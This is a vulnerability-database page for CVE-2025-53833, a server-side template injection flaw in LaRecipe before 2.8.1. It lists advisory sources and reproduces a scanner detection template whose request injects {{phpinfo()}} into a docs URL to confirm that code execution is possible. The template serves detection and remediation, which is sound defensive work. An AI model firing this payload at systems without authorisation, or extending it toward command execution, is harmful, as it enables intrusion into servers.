| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
| CVE-2025-53833 | 15 Jul 202510:16 | – | circl | |
| LaRecipe 安全漏洞 | 14 Jul 202500:00 | – | cnnvd | |
| CVE-2025-53833 | 14 Jul 202522:56 | – | cve | |
| CVE-2025-53833 LaRecipe is vulnerable to Server-Side Template Injection attacks | 14 Jul 202522:56 | – | cvelist | |
| EUVD-2025-21400 | 14 Jul 202522:56 | – | euvd | |
| LaRecipe is vulnerable to Server-Side Template Injection attacks | 14 Jul 202521:22 | – | github | |
| CVE-2025-53833 | 14 Jul 202523:15 | – | nvd | |
| CVE-2025-53833 LaRecipe is vulnerable to Server-Side Template Injection attacks | 14 Jul 202522:56 | – | osv | |
| GHSA-JV7X-XHV2-P5V2 LaRecipe is vulnerable to Server-Side Template Injection attacks | 14 Jul 202521:22 | – | osv | |
| PT-2025-29522 | 14 Jul 202500:00 | – | ptsecurity |
id: CVE-2025-53833
info:
name: LaRecipe < 2.8.1 Remote Code Execution via SSTI
author: iamnoooob,pdresearch
severity: critical
description: |
LaRecipe is an application that allows users to create documentation with Markdown inside a Laravel app. Versions prior to 2.8.1 are vulnerable to Server-Side Template Injection (SSTI), which could potentially lead to Remote Code Execution (RCE) in vulnerable configurations.
impact: |
Attackers could execute arbitrary commands on the server, access sensitive environment variables, and/or escalate access depending on server configuration.
remediation: |
Users are strongly advised to upgrade to version v2.8.1 or later to receive a patch.
reference:
- https://github.com/saleem-hadad/larecipe/security/advisories/GHSA-jv7x-xhv2-p5v2
- https://github.com/advisories/GHSA-jv7x-xhv2-p5v2
- https://nvd.nist.gov/vuln/detail/CVE-2025-53833
classification:
epss-score: 0.09357
epss-percentile: 0.94788
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cve-id: CVE-2025-53833
cwe-id: CWE-1336
cpe: cpe:2.3:a:binarytorch:larecipe:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: binarytorch
product: larecipe
fofa-query: body="/binarytorch/larecipe/"
tags: cve,cve2025,larecipe,rce,ssti,oss,vkev,vuln
http:
- raw:
- |
GET /docs/1.0/?{{phpinfo()}} HTTP/1.1
Host: {{Hostname}}
skip-variables-check: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "PHP Extension"
- "PHP Version"
- "larecipe"
condition: and
- type: status
status:
- 200
# digest: 4b0a00483046022100f2515f29e25483314b41b904506044f93769690fd884ce9465cb255079640167022100cd1194f60141ceabb4b3ac2166f02efa075c322e5701984a070724b39d0a21a0:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation